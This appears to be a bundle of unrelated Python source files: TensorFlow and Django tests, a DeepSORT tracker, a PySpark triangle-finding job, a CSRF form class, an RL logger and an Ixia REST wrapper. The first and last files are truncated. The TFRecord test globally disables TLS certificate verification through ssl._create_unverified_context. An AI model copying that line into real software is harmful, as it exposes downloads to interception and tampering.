:param max_polling_time_seconds: Maximum time in seconds to poll.
:returns: On-chain block information.
"""
elapsed = 0.0
while True:
block = get_block()
if block["header"]["era_end"] is not None:
return block
elapsed += polling_interval_seconds
if elapsed > max_polling_time_seconds:
break
time.sleep(polling_interval_seconds)
|
# -*- coding: utf-8 -*-
#
"""
Unit tests for data related operations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import copy
import shutil
import tempfile
import ssl
import tensorflow as tf
import texar.tf as tx
ssl._create_default_https_context = ssl._create_unverified_context
class TFRecordDataTest(tf.test.TestCase):
"""Tests tfrecord data class.
"""
# pylint: disable=too-many-locals
def setUp(self):
tf.test.TestCase.setUp(self)
# Create test data
# pylint: disable=no-member
self._test_dir = tempfile.mkdtemp()
cat_in_snow = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'cat_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/320px-Felis_catus-cat_on_snow.jpg')
williamsburg_bridge = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'bridge_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/194px-New_East_River_Bridge_from_Brooklyn_'
'det.4a09796u.jpg')
def _bytes_feature(value=None):
"""Returns a bytes_list from a string / byte.
"""
# pylint: disable=undefined-loop-variable
value = tf.compat.as_bytes(
value,
encoding='utf-8'
)
return tf.train.Feature(
bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value=None):
"""Returns an int64_list from a bool / enum / int / uint.
"""
return tf.train.Feature(
int64_list=tf.train.Int64List(value=[value]))
_feature_original_types = {
'height': ['tf.int64', 'FixedLenFeature'],
'width': ['tf.int64', 'FixedLenFeature'],
'label': ['tf.int64', 'FixedLenFeature'],
'shape': [tf.int64, 'VarLenFeature'],
'image_raw': ['tf.string', 'FixedLenFeature'],
'variable1': [tf.string, 'FixedLenFeature'],
'variable2': ['tf.int64', 'FixedLenFeature'],
}
self._feature_convert_types = {
'variable1': 'tf.float32',
'variable2': 'tf.string',
}
_image_options = {}
self._unconvert_features = ['height', 'width', 'label']
def _image_example(image_string, image_shape, label):
"""Create data example with image
"""
feature = {
'height': _int64_feature(image_shape[0]),
'width': _int64_feature(image_shape[1]),
'shape': tf.train.Feature(
int64_list=tf.train.Int64List(value=list(image_shape))),
'label': _int64_feature(label),
'image_raw': _bytes_feature(image_string),
'variable1': _bytes_feature('1234567890'),
'variable2': _int64_feature(9876543210),
}
return tf.train.Example(
features=tf.train.Features(feature=feature))
self._dataset_valid = {
'height': [],
'width': [],
'shape': [],
'label': [],
'image_raw': [],
'variable1': [],
'variable2': [],
}
_toy_image_labels_valid = {
cat_in_snow : 0,
williamsburg_bridge : 1,
}
_toy_image_shapes = {
cat_in_snow: (213, 320, 3),
williamsburg_bridge: (239, 194),
}
_tfrecord_filepath = os.path.join(
self._test_dir,
'test.tfrecord')
# Prepare Validation data
with tf.python_io.TFRecordWriter(_tfrecord_filepath) as writer:
for image_path, label in _toy_image_labels_valid.items():
with open(image_path, 'rb') as fid:
image_data = fid.read()
image_shape = _toy_image_shapes[image_path]
tf_example = _image_example(image_data, image_shape, label)
writer.write(tf_example.SerializeToString())
#_construct_dataset_valid("", shape, label)
single_data = {
'height': image_shape[0],
'width': image_shape[1],
'shape': image_shape,
'label': label,
'image_raw': image_data,
'variable1': "1234567890",
'variable2': int(9876543210),
}
for key, value in single_data.items():
self._dataset_valid[key].append(value)
self._hparams = {
"num_epochs": 1,
"batch_size": 1,
"shuffle": False,
"dataset": {
"files": _tfrecord_filepath,
"feature_original_types": _feature_original_types,
"feature_convert_types": self._feature_convert_types,
"image_options": [_image_options],
}
}
def tearDown(self):
"""Remove the downloaded files after the test
"""
shutil.rmtree(self._test_dir)
def _run_and_test(self, hparams):
# Construct database
tfrecord_data = tx.data.TFRecordData(hparams)
iterator = tfrecord_data.dataset.make_initializable_iterator()
data_batch = iterator.get_next()
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
sess.run(tf.tables_initializer())
sess.run(iterator.initializer)
i = 0
def _prod(lst):
res = 1
for i in lst:
res *= i
return res
while True:
try:
# Run the logics
data_batch_ = sess.run(data_batch)
self.assertEqual(
set(data_batch_.keys()),
set(tfrecord_data.list_items()))
# Check data consistency
for key in self._unconvert_features:
value = data_batch_[key][0]
self.assertEqual(value, self._dataset_valid[key][i])
self.assertEqual(
list(data_batch_['shape'].values),
list(self._dataset_valid['shape'][i]))
# Check data type conversion
for key, item in self._feature_convert_types.items():
value = data_batch_[key][0]
if item == 'tf.string' or item is tf.string:
self.assertTrue(isinstance(value, bytes))
else:
dtype_matched = (
tx.utils.dtypes.get_tf_dtype(str(value.dtype))
is tx.utils.dtypes.get_tf_dtype(item))
self.assertTrue(dtype_matched)
# Check image decoding and resize
if hparams["dataset"].get("image_options"):
image_options = hparams["dataset"].get("image_options")
if isinstance(image_options, dict):
image_options = [image_options]
for image_option_feature in image_options:
image_key = image_option_feature.get(
"image_feature_name")
if image_key is None:
continue
image_gen = data_batch_[image_key][0]
image_valid_shape = self._dataset_valid["shape"][i]
resize_height = image_option_feature.get(
"resize_height")
resize_width = image_option_feature.get(
"resize_width")
if resize_height and resize_width:
self.assertEqual(
image_gen.shape[0] * image_gen.shape[1],
resize_height * resize_width)
else:
self.assertEqual(
_prod(image_gen.shape),
_prod(image_valid_shape))
i += 1
except tf.errors.OutOfRangeError:
print('Done -- epoch limit reached')
break
def test_default_setting(self):
"""Tests the logics of TFRecordData.
"""
self._run_and_test(self._hparams)
def test_image_resize(self):
"""Tests the image resize function
"""
hparams = copy.copy(self._hparams)
_image_options = {
'image_feature_name': 'image_raw',
'resize_height': 512,
'resize_width': 512,
}
hparams["dataset"].update({"image_options": _image_options})
self._run_and_test(hparams)
if __name__ == "__main__":
tf.test.main()
|
people = int(input())
presentation = ""
total_score = 0
total_average = 0
count_presentation = 0
while True:
command = input()
if command == "Finish":
break
presentation = command
score = 0
count_presentation += 1
for i in range(0, people):
score += float(input())
average_score = score / people
total_score += average_score
print(f"{presentation} - {average_score:.2f}.")
total_average = total_score / count_presentation
print(f"Student's final assessment is {total_average:.2f}.")
|
import os
from django.contrib.gis.utils import LayerMapping
from liveapp.models import Town
town_mapping = {
'town_name': 'Town_Name',
'town_type': 'Town_Type',
'geom': 'MULTIPOINT',
}
town_shp = os.path.abspath(os.path.join(os.path.dirname(__file__), 'data/subcounty', 'towns.shp'),)
def run(verbose=True):
lm = LayerMapping(
Town, town_shp, town_mapping,
transform=False, encoding='iso-8859-1',
)
lm.save(strict=True, verbose=verbose)
|
"""
Python <= 3.4 compat for singledispatch.
"""
from sys import version_info
if (version_info.major, version_info.minor) < (3, 4): # pragma: no cover
from singledispatch import singledispatch
else: # pragma: no cover
from functools import singledispatch
__all__ = ['singledispatch']
|
# vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from . import kalman_filter
from . import linear_assignment
from . import iou_matching
from .track import Track
class Tracker:
"""
This is the multi-target tracker.
Parameters
----------
metric : nn_matching.NearestNeighborDistanceMetric
A distance metric for measurement-to-track association.
max_age : int
Maximum number of missed misses before a track is deleted.
n_init : int
Number of consecutive detections before the track is confirmed. The
track state is set to `Deleted` if a miss occurs within the first
`n_init` frames.
Attributes
----------
metric : nn_matching.NearestNeighborDistanceMetric
The distance metric used for measurement to track association.
max_age : int
Maximum number of missed misses before a track is deleted.
n_init : int
Number of frames that a track remains in initialization phase.
kf : kalman_filter.KalmanFilter
A Kalman filter to filter target trajectories in image space.
tracks : List[Track]
The list of active tracks at the current time step.
"""
def __init__(self, metric, max_iou_distance=0.7, max_age=70, n_init=3, h = np.identity(3, float)):
self.metric = metric
self.max_iou_distance = max_iou_distance
self.max_age = max_age
self.n_init = n_init
self.kf = kalman_filter.KalmanFilter()
self.tracks = []
self._next_id = 1
self.H = h
def predict(self):
"""Propagate track state distributions one time step forward.
This function should be called once every time step, before `update`.
"""
for track in self.tracks:
track.predict(self.kf)
def update(self, detections, h=np.identity(3)):
"""Perform measurement update and track management.
Parameters
----------
detections : List[deep_sort.detection.Detection]
A list of detections at the current time step.
"""
# Run matching cascade.
matches, unmatched_tracks, unmatched_detections = \
self._match(detections)
# Update track set.
for track_idx, detection_idx in matches:
self.tracks[track_idx].update(
self.kf, detections[detection_idx])
for track_idx in unmatched_tracks:
self.tracks[track_idx].mark_missed()
for detection_idx in unmatched_detections:
self._initiate_track(detections[detection_idx])
self.tracks = [t for t in self.tracks if not t.is_deleted()]
# Update distance metric.
active_targets = [t.track_id for t in self.tracks if t.is_confirmed()]
features, targets = [], []
for track in self.tracks:
if not track.is_confirmed():
continue
features += track.features
targets += [track.track_id for _ in track.features]
track.features = []
self.metric.partial_fit(
np.asarray(features), np.asarray(targets), active_targets)
def _match(self, detections):
def gated_metric(tracks, dets, track_indices, detection_indices):
features = np.array([dets[i].feature for i in detection_indices])
targets = np.array([tracks[i].track_id for i in track_indices])
cost_matrix = self.metric.distance(features, targets)
print("cost_matrix1:\n", cost_matrix)
cost_matrix = linear_assignment.gate_cost_matrix(
self.kf, cost_matrix, tracks, dets, track_indices,
detection_indices, only_position=True)
print("cost_matrix2:\n", cost_matrix)
return cost_matrix
# Split track set into confirmed and unconfirmed tracks.
confirmed_tracks = [
i for i, t in enumerate(self.tracks) if t.is_confirmed()]
unconfirmed_tracks = [
i for i, t in enumerate(self.tracks) if not t.is_confirmed()]
# Associate confirmed tracks using appearance features.
matches_a, unmatched_tracks_a, unmatched_detections = \
linear_assignment.matching_cascade(
gated_metric, self.metric.matching_threshold, self.max_age,
self.tracks, detections, confirmed_tracks)
# Associate remaining tracks together with unconfirmed tracks using IOU.
iou_track_candidates = unconfirmed_tracks + [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update == 1]
unmatched_tracks_a = [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update != 1]
matches_b, unmatched_tracks_b, unmatched_detections = \
linear_assignment.min_cost_matching(
iou_matching.iou_cost, self.max_iou_distance, self.tracks,
detections, iou_track_candidates, unmatched_detections)
matches = matches_a + matches_b
unmatched_tracks = list(set(unmatched_tracks_a + unmatched_tracks_b))
return matches, unmatched_tracks, unmatched_detections
def _initiate_track(self, detection):
mean, covariance = self.kf.initiate(detection.to_toppoint())
self.tracks.append(Track(
mean, covariance, self._next_id, self.n_init, self.max_age,
detection.feature, h=self.H))
self._next_id += 1
|
"""
To understand why this file is here, please read:
http://cookiecutter-django.readthedocs.io/en/latest/faq.html#why-is-there-a-django-contrib-sites-directory-in-cookiecutter-django
"""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'crewbank.io',
'name': 'CrewBank'
}
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'example.com',
'name': 'example.com'
}
)
class Migration(migrations.Migration):
dependencies = [
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.RunPython(update_site_forward, update_site_backward),
]
|
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@test.com",
password="test123"
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@test.com",
password="test123",
name="Test User"
)
def test_users_listed(self):
"""Test if the user listed on the user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
def index(request):
# return HttpResponse("Hello, world. You're at the polls index.")
return render(request, 'login/index.html')
|
import logging
class BaseResponseHandler:
def on_execution(self, event):
logging.debug(event)
return event
def on_exception(self, ex):
logging.exception(str(ex))
raise
def on_response(self, response):
logging.debug(response)
return response
|
from pyspark import SparkContext
import sys
import time
# Put node with smaller id as src of edge and node with bigger id as dst.
def reOrderingSrcAndDstOfEgde(x:list)-> tuple:
src = x[0]
dst = x[1]
probability = x[2]
if src < dst:
return (src,(dst,probability))
else:
return (dst,(src,probability))
# Find which edges must exist to create triangles with bases a specific node
# Returns also all the already existig edges.
def findEdgesToSearchToCalculateAllTriangles(node:str, listOfEdges:list)-> list:
listOfEdges.sort(key= lambda x: x[0])
edgesToSearchAndEdgesThatExist = list()
for index,edge in enumerate(listOfEdges):
dstNode = edge[0]
edge_probability = edge[1]
edgesToSearchAndEdgesThatExist.append( ((node,dstNode), (edge_probability,"-1")) ) # The edges that exist. The "-1" is a flag that shows that this edge exist
for edge2 in listOfEdges[index + 1:]: # Calculate all the edges that are need to create triangles with basis this node
# The value "X" is dummy and is need in order to have the same structure in all key-value pairs
# The node in the key-value pair shows which node needs this edge to create a triangle
edgesToSearchAndEdgesThatExist.append( ((dstNode,edge2[0]), ("X",node)) )
return edgesToSearchAndEdgesThatExist
# return the edges that were searched to calculate the existing triangles to the nodes that need them
# returns also the edges to the node from which they were extracted
def returnTheSearchedEdgesThatExist(edge:tuple, listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles:list)-> tuple:
listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles.sort(key= lambda x: x[1]) # put fisrt element of the list the key-value pair that shows if edge exist
edgesToReturn = list()
if listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][1] == "-1": # Edge exist in the graph
edgeProbability = listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][0]
edgesToReturn.append( (edge[0],(edge,edgeProbability)) )
for keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle in listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[1:]:
edgesToReturn.append( (keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle[1], (edge,edgeProbability)) )
return edgesToReturn
else: # Edge doesn't exist in the graph
return edgesToReturn # edgesToReturn = []
# Finds the triangles that exist with basis a node and their probabilities
def calculateTriangles(node, listOfEdges:list)-> list:
listOfEdges.sort(reverse=True,key= lambda x: x[0][0])
edges_dic = dict((key,value) for key, value in listOfEdges)
trianglesThatExist = list()
for edge1 in listOfEdges:
if edge1[0][0] > node: # triangle exist with bases this node
edge2 = (node,edge1[0][0])
edge3 = (node,edge1[0][1])
triangleName = node + "," + edge1[0][0] + "," + edge1[0][1]
triangleProbability = float(edges_dic[edge1[0]]) * float(edges_dic[edge2]) * float(edges_dic[edge3])
trianglesThatExist.append((triangleName,triangleProbability))
else: # no triangle exist with bases this node
break
return trianglesThatExist
def main(TopK:str):
sc = SparkContext(appName="Top-k most probable triangles")
# edgesRDD = sc.textFile("./input/ex.csv")
# edgesRDD = sc.textFile("./input/collins.csv")
# edgesRDD = sc.textFile("./input/ex_exploit_bug.csv")
edgesRDD = sc.textFile("./input/artists_uniform.csv")
# artists_uniform.csv, artists_normal.csv, artists_power_law.csv
trianglesRDD = edgesRDD \
.map(lambda x: x.split(",")) \
.map(lambda x: reOrderingSrcAndDstOfEgde(x)) \
.groupByKey() \
.flatMap(lambda x: findEdgesToSearchToCalculateAllTriangles(x[0],list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: returnTheSearchedEdgesThatExist(x[0], list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: calculateTriangles(x[0], list(x[1]))) \
.sortBy(lambda x: x[1], ascending=False) \
.take(int(TopK))
# .count()
# print(trianglesRDD)
# for triangle in trianglesRDD:
# print(triangle)
sc.stop()
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Give k as input")
sys.exit()
start = time.time()
main(sys.argv[1])
end = time.time()
print("Execution time : " + str(end - start))
|
from __future__ import unicode_literals
from wtforms.form import Form
from wtforms.validators import ValidationError
from .fields import CSRFTokenField
class SecureForm(Form):
"""
Form that enables CSRF processing via subclassing hooks.
"""
csrf_token = CSRFTokenField()
def __init__(self, formdata=None, obj=None, prefix="", csrf_context=None, **kwargs):
"""
:param csrf_context:
Optional extra data which is passed transparently to your
CSRF implementation.
"""
super(SecureForm, self).__init__(formdata, obj, prefix, **kwargs)
self.csrf_token.current_token = self.generate_csrf_token(csrf_context)
def generate_csrf_token(self, csrf_context):
"""
Implementations must override this to provide a method with which one
can get a CSRF token for this form.
A CSRF token should be a string which can be generated
deterministically so that on the form POST, the generated string is
(usually) the same assuming the user is using the site normally.
:param csrf_context:
A transparent object which can be used as contextual info for
generating the token.
"""
raise NotImplementedError()
def validate_csrf_token(self, field):
"""
Override this method to provide custom CSRF validation logic.
The default CSRF validation logic simply checks if the recently
generated token equals the one we received as formdata.
"""
if field.current_token != field.data:
raise ValidationError(field.gettext("Invalid CSRF Token"))
@property
def data(self):
d = super(SecureForm, self).data
d.pop("csrf_token")
return d
|
import csv
import json
import os
import shutil
from collections import defaultdict
import numpy as np
import torch
import torchvision
from termcolor import colored
from torch.utils.tensorboard import SummaryWriter
COMMON_TRAIN_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float'),
('duration', 'D', 'time')]
COMMON_EVAL_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float')]
AGENT_TRAIN_FORMAT = {
'drq': [('batch_reward', 'BR', 'float'), ('actor_loss', 'ALOSS', 'float'),
('critic_loss', 'CLOSS', 'float'),
('alpha_loss', 'TLOSS', 'float'), ('alpha_value', 'TVAL', 'float'),
('actor_entropy', 'AENT', 'float')]
}
class AverageMeter(object):
def __init__(self):
self._sum = 0
self._count = 0
def update(self, value, n=1):
self._sum += value
self._count += n
def value(self):
return self._sum / max(1, self._count)
class MetersGroup(object):
def __init__(self, file_name, formating):
self._csv_file_name = self._prepare_file(file_name, 'csv')
self._formating = formating
self._meters = defaultdict(AverageMeter)
self._csv_file = open(self._csv_file_name, 'w')
self._csv_writer = None
def _prepare_file(self, prefix, suffix):
file_name = f'{prefix}.{suffix}'
if os.path.exists(file_name):
os.remove(file_name)
return file_name
def log(self, key, value, n=1):
self._meters[key].update(value, n)
def _prime_meters(self):
data = dict()
for key, meter in self._meters.items():
if key.startswith('train'):
key = key[len('train') + 1:]
else:
key = key[len('eval') + 1:]
key = key.replace('/', '_')
data[key] = meter.value()
return data
def _dump_to_csv(self, data):
if self._csv_writer is None:
self._csv_writer = csv.DictWriter(self._csv_file,
fieldnames=sorted(data.keys()),
restval=0.0)
self._csv_writer.writeheader()
self._csv_writer.writerow(data)
self._csv_file.flush()
def _format(self, key, value, ty):
if ty == 'int':
value = int(value)
return f'{key}: {value}'
elif ty == 'float':
return f'{key}: {value:.04f}'
elif ty == 'time':
return f'{key}: {value:04.1f} s'
else:
raise f'invalid format type: {ty}'
def _dump_to_console(self, data, prefix):
prefix = colored(prefix, 'yellow' if prefix == 'train' else 'green')
pieces = [f'| {prefix: <14}']
for key, disp_key, ty in self._formating:
value = data.get(key, 0)
pieces.append(self._format(disp_key, value, ty))
print(' | '.join(pieces))
def dump(self, step, prefix, save=True):
if len(self._meters) == 0:
return
if save:
data = self._prime_meters()
data['step'] = step
self._dump_to_csv(data)
self._dump_to_console(data, prefix)
self._meters.clear()
class Logger(object):
def __init__(self,
log_dir,
save_tb=False,
log_frequency=10000,
action_repeat=1,
agent='drq'):
self._log_dir = log_dir
self._log_frequency = log_frequency
self._action_repeat = action_repeat
if save_tb:
tb_dir = os.path.join(log_dir, 'tb')
if os.path.exists(tb_dir):
try:
shutil.rmtree(tb_dir)
except:
print("logger.py warning: Unable to remove tb directory")
pass
self._sw = SummaryWriter(tb_dir)
else:
self._sw = None
# each agent has specific output format for training
assert agent in AGENT_TRAIN_FORMAT
train_format = COMMON_TRAIN_FORMAT + AGENT_TRAIN_FORMAT[agent]
self._train_mg = MetersGroup(os.path.join(log_dir, 'train'),
formating=train_format)
self._eval_mg = MetersGroup(os.path.join(log_dir, 'eval'),
formating=COMMON_EVAL_FORMAT)
def _should_log(self, step, log_frequency):
log_frequency = log_frequency or self._log_frequency
return step % log_frequency == 0
def _update_step(self, step):
return step * self._action_repeat
def _try_sw_log(self, key, value, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_scalar(key, value, step)
def _try_sw_log_image(self, key, image, step):
step = self._update_step(step)
if self._sw is not None:
assert image.dim() == 3
grid = torchvision.utils.make_grid(image.unsqueeze(1))
self._sw.add_image(key, grid, step)
def _try_sw_log_video(self, key, frames, step):
step = self._update_step(step)
if self._sw is not None:
frames = torch.from_numpy(np.array(frames))
frames = frames.unsqueeze(0)
self._sw.add_video(key, frames, step, fps=30)
def _try_sw_log_histogram(self, key, histogram, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_histogram(key, histogram, step)
def log(self, key, value, step, n=1, log_frequency=1):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def eval_log(self, key, value, step, n=1, log_frequency=1):
"""Same as self.log(), except we don't call self._should_log().
In other words, we always log."""
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def log_param(self, key, param, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
self.log_histogram(key + '_w', param.weight.data, step)
if hasattr(param.weight, 'grad') and param.weight.grad is not None:
self.log_histogram(key + '_w_g', param.weight.grad.data, step)
if hasattr(param, 'bias') and hasattr(param.bias, 'data'):
self.log_histogram(key + '_b', param.bias.data, step)
if hasattr(param.bias, 'grad') and param.bias.grad is not None:
self.log_histogram(key + '_b_g', param.bias.grad.data, step)
def log_image(self, key, image, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_image(key, image, step)
def log_video(self, key, frames, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_video(key, frames, step)
def log_histogram(self, key, histogram, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_histogram(key, histogram, step)
def dump(self, step, save=True, ty=None):
step = self._update_step(step)
if ty is None:
self._train_mg.dump(step, 'train', save)
self._eval_mg.dump(step, 'eval', save)
elif ty == 'eval':
self._eval_mg.dump(step, 'eval', save)
elif ty == 'train':
self._train_mg.dump(step, 'train', save)
else:
raise f'invalid log type: {ty}'
|
'''
Level order binary tree traversal
'''
from collections import deque
class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
n1 = Node(1)
n2 = Node(2)
n3 = Node(3)
n4 = Node(None)
n5 = Node(2)
n6 = Node(None)
n7 = Node(3)
'''
1
/ \
2 2
/ \ / \
3 None 3
'''
# setup left tree
n1.left = n2
n2.left = n3
n2.right = n4
# setup right tree
n1.right = n5
n5.left = n6
n5.right = n7
nodes = deque([n1])
while nodes:
current_node = nodes.popleft()
print current_node.value
if current_node.left:
nodes.append(current_node.left)
if current_node.right:
nodes.append(current_node.right)
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class Ports(Base):
"""
The Ports class encapsulates a list of ports resources that are managed by the system.
A list of resources can be retrieved from the server using the Ports.find() method.
"""
__slots__ = ()
_SDM_NAME = 'ports'
_SDM_ATT_MAP = {
'Description': 'description',
'IsAvailable': 'isAvailable',
'IsBusy': 'isBusy',
'IsLinkUp': 'isLinkUp',
'Location': 'location',
'Owner': 'owner',
'ResourceMode': 'resourceMode',
}
def __init__(self, parent):
super(Ports, self).__init__(parent)
@property
def Description(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def IsAvailable(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsAvailable'])
@property
def IsBusy(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsBusy'])
@property
def IsLinkUp(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsLinkUp'])
@property
def Location(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Location'])
@property
def Owner(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Owner'])
@property
def ResourceMode(self):
"""
Returns
-------
- str(normal | tenGig | fortyGig | singleMode | dualMode | hundredGigNonFanOut | fortyGigFanOut | threeByTenGigFanOut | eightByTenGigFanOut | fourByTwentyFiveGigNonFanOut | twoByTwentyFiveGigNonFanOut | oneByFiftyGigNonFanOut | fortyGigNonFanOut | oneByTenGigFanOut | fourByTenGigFanOut | incompatibleMode | hundredGigCapturePlayback | fortyGigCapturePlayback | novusHundredGigNonFanOut | novusFourByTwentyFiveGigNonFanOut | novusTwoByFiftyGigNonFanOut | novusOneByFortyGigNonFanOut | novusFourByTenGigNonFanOut | krakenOneByFourHundredGigNonFanOut | krakenOneByTwoHundredGigNonFanOut | krakenTwoByOneHundredGigFanOut | krakenFourByFiftyGigFanOut | aresOneOneByFourHundredGigNonFanOut | aresOneTwoByTwoHundredGigFanOut | aresOneFourByOneHundredGigFanOut | aresOneFourByOneHundredGigMacSecFanOut | aresOneEightByFiftyGigFanOut | uhdOneHundredEightByHundredGigNonFanOut | uhdOneHundredEightByFortyGigNonFanOut | uhdOneHundredSixteenByFiftyGigFanOut | uhdOneHundredThirtyTwoByTwentyFiveGigFanOut | uhdOneHundredThirtyTwoByTenGigFanOut | notApplicable):
"""
return self._get_attribute(self._SDM_ATT_MAP['ResourceMode'])
def find(self, Description=None, IsAvailable=None, IsBusy=None, IsLinkUp=None, Location=None, Owner=None, ResourceMode=None):
"""Finds and retrieves ports resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ports resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all ports resources from the server.
Args
----
- Description (str):
- IsAvailable (bool):
- IsBusy (bool):
- IsLinkUp (bool):
- Location (str):
- Owner (str):
- ResourceMode (str(normal | tenGig | fortyGig | singleMode | dualMode | hundredGigNonFanOut | fortyGigFanOut | threeByTenGigFanOut | eightByTenGigFanOut | fourByTwentyFiveGigNonFanOut | twoByTwentyFiveGigNonFanOut | oneByFiftyGigNonFanOut | fortyGigNonFanOut | oneByTenGigFanOut | fourByTenGigFanOut | incompatibleMode | hundredGigCapturePlayback | fortyGigCapturePlayback | novusHundredGigNonFanOut | novusFourByTwentyFiveGigNonFanOut | novusTwoByFiftyGigNonFanOut | novusOneByFortyGigNonFanOut | novusFourByTenGigNonFanOut | krakenOneByFourHundredGigNonFanOut | krakenOneByTwoHundredGigNonFanOut | krakenTwoByOneHundredGigFanOut | krakenFourByFiftyGigFanOut | aresOneOneByFourHundredGigNonFanOut | aresOneTwoByTwoHundredGigFanOut | aresOneFourByOneHundredGigFanOut | aresOneFourByOneHundredGigMacSecFanOut | aresOneEightByFiftyGigFanOut | uhdOneHundredEightByHundredGigNonFanOut | uhdOneHundredEightByFortyGigNonFanOut | uhdOneHundredSixteenByFiftyGigFanOut | uhdOneHundredThirtyTwoByTwentyFiveGigFanOut | uhdOneHundredThirtyTwoByTenGigFanOut | notApplicable)):
Returns
-------
- self: This instance with matching ports resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of ports data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the ports resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def ClearOwnership(self):
"""Executes the clearOwnership operation on the server.
Clears ownership on a list of location ports.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
